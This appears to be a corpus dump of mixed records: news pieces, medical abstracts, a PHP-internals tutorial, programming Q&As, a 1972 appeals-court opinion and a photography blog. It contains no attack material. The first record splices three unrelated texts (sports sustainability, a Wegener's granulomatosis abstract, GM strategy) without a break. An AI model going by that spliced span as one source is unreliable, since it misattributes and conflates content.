Especially now, given the acrimony in Washington, professional sports may have a broader and more profound influence than any other single entity on American mindsets, slicing through socioeconomic and political divides. “More than 150 million Americans – half our population – regularly follow professional sports,” Allen Hershkowitz, Senior Scientist at Natural Resources Defense Council, told me. Hershkowitz founded the NRDC project greensports.org, a pro-bono consultancy that advises teams and leagues on environmental strategies.
For nearly a century, professional sports have galvanized social movements and ginned up American patriotism. Baseball, for instance, desegregated a decade before the nation did, helping catalyze the civil rights movement. Women's basketball and softball leagues were organized before women had the right to vote.
Clinical features and therapeutic management of subglottic stenosis in patients with Wegener's granulomatosis.
The objective of the study was to evaluate the clinical features, response to treatment, and long-term outcome of subglottic stenosis (SGS) in a series of patients diagnosed as having Wegener's granulomatosis (WG) at a single institution. Subglottic stenosis developed in 6 out of 51 (11.7%) patients, in four of them in the absence of other features of active disease, and was the symptom that led to WG diagnosis in three cases. In two cases, SGS began while the patients were receiving systemic immunosuppressive therapy for disease activity involving other sites. PR3-ANCAs were positive in four cases. An urgent tracheostomy was needed in two patients. Four patients achieved SGS clinical remission on standard treatment with glucocorticoids and cyclophosphamide, but three of them experienced repeated local relapses and required additional immunosuppressive therapy and mechanical dilations. In one case, a local relapse was successfully managed with endotracheal dilation of the stenotic segment and intralesional injection of a long-acting corticosteroid plus mechanical dilation of the stenotic segment (ILCD) without adding supplemental immunosuppressant drugs. Two patients with isolated SGS were also successfully managed with ILCD alone and did not require the institution of systemic immunosuppressive therapy. One patient underwent open surgical repair when the disease was under control. Our data suggest that subglottic stenosis often occurs or progresses independently of other features of active WG, and that ILCD may be a safe alternative to conventional immunosuppressive therapy in patients who develop SGS in the absence of other features of active disease, allowing a reduction in treatment-related toxicity.
Can automakers walk and chew gum at the same time?
That’s the challenge facing the world’s giants, from General Motors and Ford to Volkswagen, Toyota and Hyundai.
How do they invest billions of dollars and countless hours of engineering and design talent in electric and self-driving vehicles they won’t sell in meaningful numbers for years and simultaneously develop world-class cars and trucks customers will want until the mobility revolution comes, if it ever does?
GM may be showing the way, as it moves toward the goal of having electric-powered autonomous vehicles in commercial service somewhere in the United States this year and selling a wide range of EVs around the world in the near future.
GM’s approach:
Pay less attention to vehicles people don’t care about — the automaking equivalent of Elmore Leonard’s famous instruction to writers: “Try to leave out the part that readers tend to skip.” Ceasing to build slow-selling, low-profit vehicles like the Chevy Cruze and Impala frees resources for other things.
Split product development into two channels: one focused on vehicles that will be built in high numbers for the next few years, the other on vehicles and technologies that will hit their stride later.
Eliminate the longstanding engine and transmission development group and make its responsibilities part of vehicle engineering, a change that looks minor from the outside, but constituted a seismic shift within GM.
“Things happen when you focus on them,” said Pam Fletcher, who led the program that created the Chevy Bolt electric car and Cadillac Super Cruise semi-autonomous driving system before assuming the new title of vice president for global innovation a few months ago.
“Our absolute intention is to commercialize these things. It’s not invention for invention’s sake. We’ve only been public about a fraction of what we’re doing.”
At the same time, human-driven cars powered by internal combustion engines accounted for 95% of the 8.4 million vehicles GM sold around the world last year. They pay the bills. GM can’t take its eye off them as it looks to the future.
“If you don’t shoot for the best, you fall behind very quickly” in hyper-competitive segments like SUVs and pickups, said Ken Morris, vice president of GM’s global product group. “We need to make money on conventional vehicles and that means we need to be a leader. That’s not going to change.”
Combining time and talent
Moving engine and transmission development — Global Powertrain Operations in GM-speak — 20 miles from an engineering campus in Pontiac to GM’s main tech center in Warren may look like rearranging the deck chairs, but it eliminated bureaucracy and duplication of effort that cost time and talent, Morris said.
Combine that with the work saved by dropping slow-selling vehicles and GM can tackle new challenges like batteries, electric motors and self-driving cars. Linking software development more closely to vehicle engineering removed more bottlenecks.
While electric and autonomous vehicles are profoundly different from today’s vehicles, they share many parts and systems, Fletcher points out.
They'll “still be putting four wheels and tires on every car. Areas like chassis engineering have teams that work across the organization and portfolio. We share systems across platforms,” Fletcher said.
Ford recently made similar changes. Joe Hinrichs leads Ford’s global product development and manufacturing. Jim Farley oversees advanced technology, including autonomous vehicles. Ford’s ambitious project to create an EV and AV center in Detroit’s Corktown neighborhood is also part of the company’s approach.
“The reorganizations recognize how the market has the potential to change,” IHS Markit senior analyst Stephanie Brinley said. “It’s a difficult path to walk, but one automakers must follow.”
A wait and see approach until customers demand EVs and AVs won’t do, she said. No automaker can afford to be last into the new vehicle types, but nor can any afford to ignore what buyers want today.
That dovetails with GM’s plan.
“We have a large portfolio and a large customer base,” Fletcher said. “We’re going to build a lot of kinds of vehicles for a long time.”
Contact Mark Phelan at 313-222-6731 or mmphelan@freepress.com. Follow him on Twitter @mark_phelan. Read more on autos and sign up for our autos newsletter.
|
{
"pile_set_name": "OpenWebText2"
}
|
One of the most stressful things about being a liberal blogger is having to watch as congressional Democrats stand openmouthed at the plate, watching the fastballs fly by. Steve Benen really nails it. Go read the rest:
At face value, congressional Republicans went into budget talks playing a strikingly weak hand. They're an unpopular party, pushing unpopular spending cuts, going up against a more popular president. Of the three main players -- the House, the Senate, and the White House -- the GOP controls about one-half of one-third of the relevant institutions.
And yet, who seems to be calling the shots here?
The New York Times had an interesting summary of the lay of the land, emphasizing the fact that Democrats seem to realize they let this debate slip away from them.
Both parties remain uncertain about which of them would bear the brunt of public anger if Congress cannot agree on financing federal operations for the final half of this fiscal year and government agencies shut down or drastically scale back the services they can provide. Even many Democrats believe that House Republicans have gotten the better of the antispending, antigovernment argument. But Democrats insist that is because much of the public does not appreciate the impact the Republicans' $61 billion in proposed reductions would have on spending for popular social programs if those cuts were to become law with just half of the current fiscal year remaining.
Democrats are right; most of the country has no idea the extent to which the GOP's proposed cuts would be devastating to key domestic priorities. These are cuts that, if put to a poll, the vast majority of the American mainstream would reject out of hand.
But here's another thought: maybe most of the country has no idea how brutal these cuts are because Dems haven't told them.
|
{
"pile_set_name": "OpenWebText2"
}
|
[Treatments of Soft Tissue Sarcomas by Orthopaedic Surgeons in Japan].
In Japan, the treatment of soft tissue sarcomas (STS) has been performed mainly by orthopaedic surgeons. The standard therapy for all cases of STS is surgical resection of the tumor. The prognosis of patients with unresectable tumors or distant metastases is poor despite treatment with intensive chemotherapy. Adjuvant chemotherapy is indicated for patients with resectable tumors. Round-cell STS, including extraskeletal Ewing sarcoma and rhabdomyosarcoma, have high sensitivity to chemotherapy. The standard treatment for round-cell STS is multimodal therapy with surgery and chemotherapy, with or without radiotherapy. On the other hand, non-round cell STS, including leiomyosarcoma, synovial sarcoma, and liposarcoma, have low sensitivity to chemotherapy. Thus, the standard treatment for non-round cell STS is, essentially, surgery. Large and high-grade non-round cell STS are also treated using adjuvant chemotherapy along with surgery. In this review, the standard therapies for STS and future perspectives in Japan are discussed.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Requirements for antiribosomal activity of pokeweed antiviral protein.
It has been known for some time that pokeweed antiviral protein acts by enzymatically inhibiting protein synthesis on eucaryotic ribosome systems. The site of this action is known to be the ribosome itself. In this paper we show that the pokeweed antiviral protein reaction against ribosomes is a strong function of salt concentration: 160 mM K+ and 3 mM Mg2+ retard the reaction, while 20 mM K+ and 2 mM Mg2+ allow the maximum reaction rate. It is also shown, however, that an unidentified protein in the postribosomal supernatant solution, together with ATP, allows the ribosome to be attacked even in the presence of high salt. Kinetic analysis of the antiviral protein reaction has been carried out under both sets of conditions, and reveals that the turnover number for the enzyme is about 300-400 mol/mol per min in each case. The Km for ribosomes is 1 microM in the presence of low salt and 0.2 microM at higher salt in the presence of postribosomal supernatant factors plus ATP. The antiviral protein reaction is also shown to be pH dependent and is controlled by a residue with a pKa value of approx. 7.0, apparently a histidine. Stoichiometric reaction of the enzyme with iodoacetamide results in a significant loss of antiribosomal activity.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
# Defining a Function
In PHP, the definition of a user function begins with the `function` keyword. Here is a simple example:
[php]
function foo($var) {
echo $var;
}
This is a very simple function: it defines a function with one parameter, and its body writes the value of the argument passed to it to standard output.
Everything about a function starts with `function`, so that keyword is where we begin our exploration of function definition.
**Lexical analysis**
In Zend/zend_language_scanner.l we find the following code:
[c]
<ST_IN_SCRIPTING>"function" {
return T_FUNCTION;
}
This means that the `function` keyword produces the T_FUNCTION token. Once this token has been obtained, syntax analysis begins.
**Syntax analysis**
In the Zend/zend_language_parser.y file, the grammar rules for a function declaration are as follows:
[c]
function:
T_FUNCTION { $$.u.opline_num = CG(zend_lineno); }
;
is_reference:
/* empty */ { $$.op_type = ZEND_RETURN_VAL; }
| '&' { $$.op_type = ZEND_RETURN_REF; }
;
unticked_function_declaration_statement:
function is_reference T_STRING {
zend_do_begin_function_declaration(&$1, &$3, 0, $2.op_type, NULL TSRMLS_CC); }
'(' parameter_list ')' '{' inner_statement_list '}' {
zend_do_end_function_declaration(&$1 TSRMLS_CC); }
;
>**NOTE**
>The part to focus on is `function is_reference T_STRING`: the `function` keyword, whether the function returns by reference, and the function name.
The T_FUNCTION token is only used to locate the function declaration and mark it as a function; most of the work concerns everything attached to the function, including its parameters, return value, and so on.
**Generating intermediate code**
After parsing, the compilation function executed is zend_do_begin_function_declaration. Its implementation can be found in Zend/zend_compile.c:
[c]
void zend_do_begin_function_declaration(znode *function_token, znode *function_name,
int is_method, int return_reference, znode *fn_flags_znode TSRMLS_DC) /* {{{ */
{
...// omitted
function_token->u.op_array = CG(active_op_array);
lcname = zend_str_tolower_dup(name, name_len);
orig_interactive = CG(interactive);
CG(interactive) = 0;
init_op_array(&op_array, ZEND_USER_FUNCTION, INITIAL_OP_ARRAY_SIZE TSRMLS_CC);
CG(interactive) = orig_interactive;
...// omitted
if (is_method) {
...// omitted: class methods are covered in the later chapter on classes
} else {
zend_op *opline = get_next_op(CG(active_op_array) TSRMLS_CC);
opline->opcode = ZEND_DECLARE_FUNCTION;
opline->op1.op_type = IS_CONST;
build_runtime_defined_function_key(&opline->op1.u.constant, lcname,
name_len TSRMLS_CC);
opline->op2.op_type = IS_CONST;
opline->op2.u.constant.type = IS_STRING;
opline->op2.u.constant.value.str.val = lcname;
opline->op2.u.constant.value.str.len = name_len;
Z_SET_REFCOUNT(opline->op2.u.constant, 1);
opline->extended_value = ZEND_DECLARE_FUNCTION;
zend_hash_update(CG(function_table), opline->op1.u.constant.value.str.val,
opline->op1.u.constant.value.str.len, &op_array, sizeof(zend_op_array),
(void **) &CG(active_op_array));
}
}
/* }}} */
The opcode generated is **ZEND_DECLARE_FUNCTION**. From this opcode and the op_type of its operands,
we can locate the function that executes it: **ZEND_DECLARE_FUNCTION_SPEC_HANDLER**.
>**NOTE**
>Notice that when the intermediate code is generated, the function name is converted entirely to lowercase, which shows that function names are not case-sensitive.
To verify this behavior, let's look at a piece of code:
[php]
function T() {
echo 1;
}
function t() {
echo 2;
}
Running this code produces the following error message on screen:
[shell]
Fatal error: Cannot redeclare t() (previously declared in ...)
This shows that, as far as PHP is concerned, T and t are the same function name. So where does the check for duplicate function names take place?
The execution of the function-declaration opcode, described next, includes this check.
**Executing the intermediate code**
In the Zend/zend_vm_execute.h file we find the handler for the ZEND_DECLARE_FUNCTION opcode: ZEND_DECLARE_FUNCTION_SPEC_HANDLER.
This handler does nothing but call do_bind_function:
[c]
do_bind_function(EX(opline), EG(function_table), 0);
In do_bind_function, the function pointed to by EX(opline) is added to EG(function_table); if a function with the same name already exists, an error is raised.
EG(function_table) holds the information for every function available during execution; it is effectively the function registry.
Its structure is a HashTable, so do_bind_function registers the new function using the HashTable operation **zend_hash_add**.
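The binding step described above can be observed from userland PHP. An unconditional top-level declaration is bound early during compilation, but a declaration inside a conditional is bound only when its ZEND_DECLARE_FUNCTION opcode actually executes. A small sketch (plain PHP; the function name `greet` is just an example):

```php
<?php
// Not yet in EG(function_table): the declaration below sits inside a
// conditional, so it is bound at execution time, not compile time.
var_dump(function_exists('greet'));   // bool(false)

if (true) {
    function greet() {
        return "hello";
    }
}

// The ZEND_DECLARE_FUNCTION opcode has now run and registered the
// lowercased name in the function table.
var_dump(function_exists('GREET'));   // bool(true), names are case-insensitive
```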
|
{
"pile_set_name": "Github"
}
|
Chelsea to pay £6.5 million for Brazilian Lucas Piazon
According to reports in the Brazilian press, Chelsea are set to fork out £6.5 million for São Paulo forward, Lucas Piazon. The 17-year-old, who has yet to make his debut for the professionals at São Paulo, is currently on tour with Brazil’s U17s in Ecuador. The deal is set to be confirmed when he returns but Piazon will not move to Chelsea until he turns 18 in January 2012. It is believed that £5.2 million will go to São Paulo with the rest going to the player and his agent Giuliano Bertolucci.
Lucas Piazon is not to be confused with São Paulo’s other Lucas, Lucas Moura, who will make his debut for Brazil versus Scotland later this month.
|
{
"pile_set_name": "Pile-CC"
}
|
Open University chiefs are planning significant reductions in the number of courses the institution offers and the number of lecturers it employs, the Guardian has learned.
Last June the OU, established in 1969 and the largest university in the UK, announced it needed to cut £100m from its £420m-a-year budget, but specific detail of where the cuts would fall was not made public.
The Guardian has seen confidential documents that spell out proposals for the cuts. Staff have been invited to apply for voluntary redundancy in a programme that launches on 9 April.
Lecturers have said the proposals are so significant they will “destroy the OU as we know it” and reduce it to “a digital content provider”. They have expressed concern about how the changes might affect the quality of degrees offered by the OU.
A document states that the number of courses, qualifications and modules available to students will be reduced by more than a third. It says there will be a smaller workforce, cutting the budget by £15-20m.
“We are sharing this information in strict confidence to give the senior team early sight of the direction of travel,” the document says.
It states that 41 undergraduate and postgraduate degree courses will be axed, leaving 71 degrees available. A range of courses including science, business, music and classics are under threat.
The document includes terms such as “focusing”, “rationalisation” and “consolidation” to describe the fundamental changes being proposed. Of particular concern to lecturers are the plans of how an OU working group hopes to push through the changes.
The Teaching, Excellence and Innovation (TEI) group is driving forward the changes. In January the university senate – the institution’s supreme academic body – declined to give the new vision for the OU the green light before seeing the full implementation plan. The TEI group is exploring alternative ways to get the plans approved if the senate does not approve them at its April meeting.
Lecturers have questioned how the university has been able to spend more than £2.5m on consultancy fees to KPMG at a time when OU chiefs say they are facing severe financial challenges. The information about consultancy fees was disclosed under the Freedom of Information Act.
A spokeswoman for the University and College Union said: “UCU members are hugely concerned at the cuts that are being mooted at the Open University. The proposals under discussion would destroy the OU as we know it, turning it from a world-leading distance education university into a digital content provider. In the process we risk losing the research base that underpins our work with the BBC, and the personal tutorial element that supports our students.
“The branch understands that a very large sum has been set aside which, going by average payments, means voluntary severance is expected for at least 250-300 individuals in the coming year. Staff expect that large-scale compulsory redundancies may follow given the scale of the announced cuts.”
An OU spokesman said: “The Open University must change to deliver its core mission of supporting students from all backgrounds to fulfil their potential through education and to equip them for a fast-evolving world. Our plans will ensure the OU is agile and innovative to meet the needs of students, business and the country for decades to come.”
He added: “We are today announcing a voluntary severance programme. This covers everyone – support staff, professional services teams and much of our academic community (but, to avoid any impact on students, not the tutors who oversee our students’ study).”
The spokesman confirmed there would be a significant reduction in research carried out at the university. “We are sharpening the focus of our research to make sure that it has the maximum value for our students. No decisions on the size of the reduction have been taken. Every aspect of the university’s work – curriculum, teaching, research, back office – is in scope.”
He said no final decision had been taken on the precise reduction in the number of degrees available to students.
Commenting on the consultancy fees paid to KPMG, the spokesman said: “This is a major transformation exercise spanning all the university’s activities. Its breadth and depth required us to draw on the best external expertise as well as skills within the university. We had an existing relationship with KPMG which led to them carrying out the initial phase of work.”
In relation to the senate issue, the spokesman said: “We are not commenting on our internal processes.”
|
{
"pile_set_name": "OpenWebText2"
}
|
Reminiscing on Hood Bush 2013

Sitting in my house bored out of my mind on this cold winter day, I figured I would rummage through some of my favorite times last year. Looking through my Hood Bush shots I realized I haven't posted most of these on this blog. I found a few that I have never posted before on any website, social media, or mag. I've been really slacking on this blog and I'm gonna try my hardest to get more stuff on here. So much stuff is just tied up with exclusive rights to mags and such. I'm working on a few shoots for Street Choppers, The Horse BC, and Chop Cult in the next few months, and I just released a new feature in March's issue of The Horse BC of my friend Mike from Chop Machine's root beer Sporty build; go check that issue out when you get a chance. The bike is called "The Horse With No Name". Thanks again Lisa Ballard for helping me with this one!

In other news, I am hopefully getting my new camera in the mail tomorrow! So stoked to finally be able to go shoot some stuff again. I went with a Canon 70D for now, because of the burst and video features built into it, and because it was similar to my old camera yet way better quality. Late this year the new 7D Mark II comes out and I am definitely grabbing that one. I also got a ton of new lenses to try out and I can hardly wait; spring cannot come soon enough to try out some of these super-wide-angle ones while riding. Stoked!!! In other good news, I will be out in Toronto at the end of the month for a Vice Magazine art show that I am going to be featured in with some prints of my work. Pretty amazing feeling to be asked to do that. Last but not least, my friend Jarrett asked me to shoot him with his bike for a tattoo/motorcycle book called "In The Wind Book". Look out for that soon!

Honored to be a part of that as well! If you have never seen the Chop Cult feature on Hood Bush, check it out here by clicking the image below. Here are a few images I found today that made me smile and wish summer was back again.
|
{
"pile_set_name": "OpenWebText2"
}
|
Q:
Error in event creation using MySQL
I am using the code below to create an EVENT in MySQL. Within the event I want to drop and re-create a table from a query.
Drop Event if exists EVT_UP_TIMESHEET;
CREATE EVENT EVT_UP_TIMESHEET
ON SCHEDULE EVERY '1' Day
STARTS '2012-08-01 12:00:00'
DO
Drop table if exists tbl_temp;
create table tbl_temp as ( SELECT e.userid AS Employee_ID,
e.memo AS Employee_Name,
e.Department AS Department,
.....
It returns the following error:
ERROR : Table tbl_temp already exists.
Please help me to do this.
A:
As a workaround, try using TRUNCATE TABLE and INSERT ... SELECT statements instead of DROP/CREATE TABLE.
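For completeness, here is a sketch of how that workaround could look. Note that a multi-statement event body must be wrapped in BEGIN ... END, with the client delimiter changed so the inner semicolons don't terminate the CREATE EVENT statement early. The `employees` source table below is hypothetical, standing in for the elided part of your query:

```sql
DELIMITER //

CREATE EVENT EVT_UP_TIMESHEET
ON SCHEDULE EVERY 1 DAY
STARTS '2012-08-01 12:00:00'
DO
BEGIN
    -- Empty the staging table instead of dropping and recreating it
    TRUNCATE TABLE tbl_temp;

    -- Repopulate it from the source query
    INSERT INTO tbl_temp
    SELECT e.userid     AS Employee_ID,
           e.memo       AS Employee_Name,
           e.Department AS Department
    FROM   employees e;   -- hypothetical source table
END//

DELIMITER ;
```

This assumes tbl_temp already exists with matching columns; create it once, outside the event.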
|
{
"pile_set_name": "StackExchange"
}
|
Q:
why we can use code $this-> in system/library/customer.php
Look at the codes below:
public function __construct($registry) {
$this->config = $registry->get('config');
$this->db = $registry->get('db');
$this->request = $registry->get('request');
$this->session = $registry->get('session');
My question is: the properties $this->config, $this->db, $this->request and $this->session are not defined in this class, and the Customer class neither inherits from another class nor implements the __get()/__set() methods...
Can someone can explain to me why we can use $this-> here?
A:
Those are just properties that are declared and assigned dynamically when the object is created. Try:
class Test{
function __construct(){
$this->name = 'Ramesh';
}
}
print_r(new Test());
|
{
"pile_set_name": "StackExchange"
}
|
455 F.2d 798
Robert N. HAYES, Jr., No. 1863, Appellant, v. SECRETARY OF DEPARTMENT OF PUBLIC SAFETY, Appellee.
No. 71-1325.
United States Court of Appeals, Fourth Circuit.
Jan. 25, 1972.
Before WINTER, CRAVEN and BUTZNER, Circuit Judges.
PER CURIAM:
Plaintiff, as disclosed by the covering letter of Patuxent Institution transmitting his pro se pleading, is a "patient" at Patuxent Institution. He sued the Secretary of the Maryland Department of Public Safety.1 The Secretary is the head of the department, Ann.Code of Md., Art. 41, Sec. 204 (1971 Replacement Vol.) and the department includes the Patuxent Institution and the Maryland State Police, Ann.Code of Md., Art. 41, Sec. 204A; Art. 31B, Sec. 2; Art. 88B, Sec. 23 (1971 Replacement Vol. and 1971 Supp.). Plaintiff alleged acts of misconduct on the part of the custodial force (presumably of the Institution), i. e., beating a named inmate, using mace and practicing brutality on other named inmates, withholding food from inmates because they protested, stealing food of inmates, beating and chaining two other inmates for misconduct and failing to provide medical treatment to inmates who were ill. Plaintiff alleged that he had requested both the defendant and the State Police at Waterloo, Maryland (a barrack near Patuxent Institution) and, in particular Trooper W. F. Lefevre, to investigate these complaints against the authorities at Patuxent, but that he received no replies. Invoking jurisdiction under 28 U.S.C.A. Sec. 1343, plaintiff prayed an injunction to restrain the State Police "from the continue discriminating against inmates when it comes to filing and investigating complaints of inmates against institution authorities for brutality and violation of the public laws [sic]."
The district court allowed the pleading to be filed in forma pauperis, but, without requiring an answer, dismissed it as frivolous. It assigned as reasons for that conclusion:
1. No exhaustion of State remedies, administratively, through the appropriate State's Attorney or the Attorney General of Maryland or through the State courts, is alleged.
2. No evidence of discrimination is alleged or indicated, in that there is no allegation that similar inquiries made by inmates of other institutions, or by the public at large, have been answered.
3. No showing has been made that Trooper Lefevre had any authority to investigate complaints, or to reply to them.
4. The court is not aware of any holding that each individual citizen has a civil right to require an answer to any complaint made even with respect to himself, much less others, or to a request for an investigation.
We disagree. We reverse the judgment of dismissal and remand for further proceedings.
Viewed with the liberality that must be afforded pro se pleadings, plaintiff has alleged a cause of action under 42 U.S.C.A. Sec. 1983, of which the district court had jurisdiction under 28 U.S.C.A. Sec. 1343. In essence plaintiff has alleged a violation of the rights of inmates to be afforded due process and not to be subjected to cruel and unusual punishment and, indeed, plaintiff has also alleged misconduct of the type mounting up to acts made criminal by the law of Maryland, e. g., common law assault and battery. Plaintiff has alleged that he reported the matters both to the defendant and the Maryland State Police and requested an investigation and corrective action. While the district court treated the essence of his complaint as one of the failures of defendant and the police to report to him, we do not read his allegation so technically or so narrowly. Rather, it seems to us that plaintiff is saying that on information and belief nothing has been done. As we will elaborate later, we think that a good cause of action may have been alleged against the police2 and the complaint contains allegations that would support a request for relief against defendant in his administration of Patuxent Institution.
We respond to the reasons of the district court for dismissal:
1. Exhaustion of state remedies, administratively or through the state courts, is not a prerequisite to the exercise of federal jurisdiction under the Civil Rights Act of 1871. Monroe v. Pape, 365 U.S. 167, 81 S.Ct. 473, 5 L.Ed.2d 492 (1961); Liles v. South Carolina Department of Corrections, 414 F.2d 612 (4 Cir. 1969). See also, Damico v. California, 389 U.S. 416, 417, 88 S.Ct. 526, 19 L.Ed.2d 647 (1967) (per curiam); McNeese v. Board of Educ., 373 U.S. 668, 671-672, 83 S.Ct. 1433, 10 L.Ed.2d 622 (1963) (alternative holding). While Maryland has recently established an Inmate Grievance Commission, Ann. Code of Md., Art. 41, Sec. 204F (1971 Supp.), to determine and recommend the proper redress for meritorious grievances of inmates of Patuxent and other correctional institutions, we take judicial notice of the fact that the Commission is not yet fully operative. When it is, there will be time enough for the Supreme Court to determine if Monroe v. Pape, and, we, our own decisions, should be reexamined. That time is not the present.
2. It is true that plaintiff does not specifically allege that charges of law violations by inmates of other institutions or the public at large have been investigated by the Maryland State Police, and that reports of investigations have been made. But, as we have said, we can only conclude that plaintiff is alleging police inaction. Unless we presume that there has been a major breakdown of the police function, we can assume that complaints of law violation by the public at large are investigated where they are as pointed and specific as those alleged by plaintiff, and even that some of the complaining parties do receive some word of the outcome of the investigation. We think that plaintiff has, therefore, indicated discrimination by his allegations.
3. Whether Trooper Lefevre has authority to investigate complaints or to reply to them is largely irrelevant, because plaintiff has alleged that he also complained to defendant, the overall administrative head of both Patuxent Institution and the Maryland State Police, who, unquestionably, had authority to act and to direct others to act. At the same time, we would assume that every police officer has authority to receive a report of a violation of law and authority to set in motion a proper investigation of the case.
4. While the district court read plaintiff's complaint narrowly to allege that plaintiff was entitled to a report of the investigation he requested, we read it as an allegation, on information and belief, that no investigation was undertaken. When the allegation is so read, plaintiff's theory of his case is novel. It is that the police can investigate charges of brutality and misconduct against correctional officials made by inmates where the alleged brutality and misconduct are a violation of civil rights and are so aggravated as to amount to a violation of state law. We know of no authority to sustain the proposition, yet we are certainly not prepared to reject it summarily, as did the district court, without requiring a responsive pleading and, if there is an issue of fact, an evidentiary hearing. Although under Monroe v. Pape, supra, and its progeny, we think that we presently lack authority to require exhaustion of state remedies, the states are certainly to be encouraged to deal with complaints of institutional brutality through their own police, through their own courts and through their own administrative procedures, rather than to constitute the federal courts the sole instrument for redress of inmates' grievances.
Some additional comments should supplement our conclusion that plaintiff has alleged a cause of action immune to summary dismissal. First, it appears that plaintiff may have an additional cause of action under the Civil Rights Act of 1871 against the officials of Patuxent Institution to require that it be administered in such a manner as not to violate the rights of those who are subjected to its treatment. It is true that plaintiff has not alleged that brutality or other misconduct has been practiced on him, but he has, in effect, alleged that he is part of an institutional population which must live from day to day under the constant threat of brutality and misconduct. It would seem, therefore, that plaintiff is "injured," is a member of a class which is "injured" and is thus competent to maintain a class action for himself and others similarly situated. Jackson v. Bishop, 404 F.2d 571 (8 Cir. 1968); Holt v. Sarver, 309 F.Supp. 362 (E.D.Ark.1970), aff'd 442 F.2d 304 (8 Cir. 1971); Morris v. Travisono, 310 F.Supp. 857 (D.R.I. 1971). See, also, Barrows v. Jackson, 346 U.S. 249, 257, 73 S.Ct. 1031, 97 L.Ed. 1586 (1953); Smith v. Board of Education, 365 F.2d 770, 776 (8 Cir. 1966); Gregory v. Litton Systems, Inc., 316 F.Supp. 401, 403-404 (C.D.Cal. 1970); Note, Limiting The Section 1983 Action In The Wake of Monroe v. Pape, 82 Harv.L.Rev. 1486, 1495, 1497 (1969). Second, with regard to the cause of action which plaintiff has alleged, judicial time would be conserved by a sharpening of the allegations and a refinement of the legal theory or theories under which plaintiff proceeds. These considerations lead us to direct that on remand the district court appoint counsel to represent plaintiff and direct that an amended complaint be filed within a reasonable time before a responsive pleading is required. Cf. Holt v. Sarver, 442 F.2d 304, 305 (8 Cir. 1971); Jackson v. Bishop, 404 F.2d 571, 572-573 (8 Cir. 1968).
Reversed and remanded.
1 The complete name of the department is Department of Public Safety and Correctional Services.
2 Since the complaint was dismissed summarily, we treat as proven the factual allegations therein. Whether the allegations are proven must await the time of trial or proof offered in support of a motion for summary judgment.
|
{
"pile_set_name": "FreeLaw"
}
|
Q:
FIPS Certification for Android & iPhone
Does anyone know the name of the cryptography libraries come with iPhone & Android SDKs ? I don't mean the name of the classes, functions etc. but the name of the provider and/or the library itself. Are they FIPS certified?
Thanks
A:
I found out that for Android it's Bouncy Castle, and it's not FIPS certified. As for Apple, it's their own implementation, which is in the process of being FIPS certified according to the Modules In Process list on NIST's website.
|
{
"pile_set_name": "StackExchange"
}
|
New York’s concrete jungle is about to get more green — and tasty — thanks to Gotham Greens, which is building a hydroponic rooftop farm in Brooklyn. The eco-efficient farm will take a small bite out of the $2 billion in produce that’s trucked into the city each year. Here’s how it works.
1. Power Feed: The $2 million, 16,000-square-foot farm — which opens this spring — is powered by a 60-kilowatt solar-voltaic array.
2. Waterworks: A large cistern collects rainwater, which is used for irrigation.
3. Buzz Off: Beneficial bugs, such as ladybugs and wasps, are used instead of pesticides to protect crops.
4. Green Wheels: Produce is delivered by bicycles or renewable-energy-powered vans, depending on distance and volume.
5. Watery Fields Forever: Everything from bok choy to basil is produced using hydroponics, a soil-free method of farming. “Our plants grow straight from nutrient-filled water,” says CEO Viraj Puri. Hydroponics uses 10 times less water than traditional farming, with higher crop yields.
6. Local Hunger: Of the 40 tons of expected crops, 70% will head to Whole Foods. The rest will be sold to restaurants and at farmers markets.
A version of this article appeared in the May 2010 issue of Fast Company magazine.
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
Changing a property modifier when merging an interface
The Window interface has a few properties that are readonly:
interface Window extends ... {
// ...
readonly innerHeight: number;
readonly innerWidth: number;
// ...
}
I get that those cannot really be changed, but in my unit tests, I'm changing the values of the object to simulate the changes. And it's an object of that type.
Is there a way I can augment that type in a custom d.ts file and change these properties modifiers?
I tried to just create a .d.ts file with this:
interface Window {
innerHeight: number;
innerWidth: number;
}
But the compiler is complaining with:
All declarations of 'innerWidth' must have identical modifiers.
A:
(I'm pretty sure that) no, you can't change the modifiers or types of existing types.
But as you're only using it for testing then it shouldn't be problematic to cast it to any:
(window as any).innerWidth = 500;
(window as any).innerHeight = 300;
Edit
There's a trick to make a type mutable:
type Mutable<T extends { [x: string]: any }, K extends string> = {
[P in K]: T[P];
}
type MyWindow = Mutable<Window, keyof Window>;
(window as MyWindow).innerWidth = 500;
(window as MyWindow).innerHeight = 300;
(code in playground)
It was suggested in this issue: Mapped Types syntax to remove modifiers, but if it's for testing then this is probably overkill and casting to any would do the trick (in my opinion).
|
{
"pile_set_name": "StackExchange"
}
|
Q:
Calculate average for specific date range in R
I have two data frames:
Date <- seq(as.Date("2013/1/1"), by = "day", length.out = 17)
x <-data.frame(Date)
x$discharge <- c("1000","1100","1200","1300","1400","1200","1300","1300","1200","1100","1200","1200","1100","1400","1200","1100","1400")
x$discharge <- as.numeric(x$discharge)
And:
Date2 <- c("2013-01-01","2013-01-08","2013-01-12","2013-01-17")
y <- data.frame(Date2)
y$concentration <- c("1.5","2.5","1.5","3.5")
y$Date2 <- as.Date(y$Date2)
y$concentration <- as.numeric(y$concentration)
What I am desperately trying to do is the following:
In data frame y the first measurement is for the period 2013-01-01 to 2013-01-07
Calculate the average discharge for this period in data frame x
Return the average discharge to data frame y in a new column next to the first measurement and continue with the next measurement
I was having a look at tools such as dplyr or apply but was not able to figure it out.
A:
library(dplyr)
x %>%
mutate(period = cut(as.Date(Date), c(as.Date("1900-01-01"), as.Date(y$Date2[-1]), as.Date("2100-01-01")), c(1:length(y$Date2)))) %>%
group_by(period) %>%
mutate(meandischarge = mean(discharge, na.rm = T)) %>%
right_join(y, by = c("Date" = "Date2"))
Date discharge period meandischarge concentration
<date> <dbl> <fctr> <dbl> <dbl>
1 2013-01-01 1000 1 1214.286 1.5
2 2013-01-08 1300 2 1200.000 2.5
3 2013-01-12 1200 3 1200.000 1.5
4 2013-01-17 1400 4 1400.000 3.5
If you only want the original y variables, you could do this:
x %>%
mutate(period = cut(as.Date(Date), c(as.Date("1900-01-01"), as.Date(y$Date2[-1]), as.Date("2100-01-01")), c(1:length(y$Date2)))) %>%
group_by(period) %>%
mutate(meandischarge = mean(discharge, na.rm = T)) %>%
ungroup() %>%
right_join(y, by = c("Date" = "Date2")) %>%
select(Date2 = Date, concentration, meandischarge)
Date2 concentration meandischarge
<date> <dbl> <dbl>
1 2013-01-01 1.5 1214.286
